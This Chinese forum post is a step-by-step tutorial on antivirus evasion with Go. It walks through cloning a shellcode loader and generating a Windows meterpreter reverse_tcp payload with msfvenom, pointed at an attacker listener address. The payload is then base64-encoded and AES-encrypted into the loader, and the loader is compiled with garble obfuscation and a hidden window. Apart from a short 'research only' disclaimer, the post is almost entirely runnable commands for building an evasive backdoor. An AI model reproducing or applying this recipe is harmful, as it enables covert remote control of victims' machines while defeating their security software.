本文旨在探讨利用 GO 语言实现的免杀技术,仅供安全研究与学习之用。我们反对一切危害网络安全的行为,并强调使用者需自行承担法律责任。
安装: 首先,需要在 Kali Linux 环境中安装 GO 环境。执行以下命令进行安装:
sudo apt-get update && sudo apt-get install -y golang
![图片[1]-GO语言免杀技术:高效安全的代码保护解决方案-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/02/20240223134418871-image.png)
项目克隆: 在本地环境中克隆项目:
git clone https://github.com/HZzz2/go-shellcode-loader.git cd go-shellcode-loader
接着,安装第三方混淆库:
go install mvdan.cc/garble@latest
![图片[2]-GO语言免杀技术:高效安全的代码保护解决方案-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/02/20240223134430341-image.png)
生成并编码 Shellcode: 使用 Metasploit 生成 Shellcode 并进行 Base64 编码:
![图片[3]-GO语言免杀技术:高效安全的代码保护解决方案-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/02/20240223134441182-image.png)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.123.43 LPORT=5555 -f raw > kali.raw base64 -w 0 -i kali.raw > kali.bs64 cat kali.bs64
![图片[4]-GO语言免杀技术:高效安全的代码保护解决方案-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/02/20240223134453246-image.png)
替换 Payload: 将生成的 Shellcode 复制到 aes-sc.go 文件的第 44 行替换原有 Payload。
![图片[5]-GO语言免杀技术:高效安全的代码保护解决方案-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/02/20240223134500119-image.png)
生成 AES 加密后的值: 运行 aes-sc.go 以生成 AES 加密后的值:
go run aes-sc.go
![图片[6]-GO语言免杀技术:高效安全的代码保护解决方案-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/02/20240223134507897-image.png)
将输出的值复制到 go-sc.go 文件的第 52 行替换原有 Payload。
编译为可执行程序: 使用 Garble 编译 go-sc.go 成为可执行程序:
garble -tiny -literals -seed=random build -ldflags=”-w -s -H windowsgui” -race go-sc.go
这样,我们就完成了基于 GO 的免杀技术的探究和实践。
![表情[qiudale]-山海云端论坛](https://www.shserve.cn/wp-content/themes/Shanhai/img/smilies/qiudale.gif)
我也是买了领不了、
暂无评论内容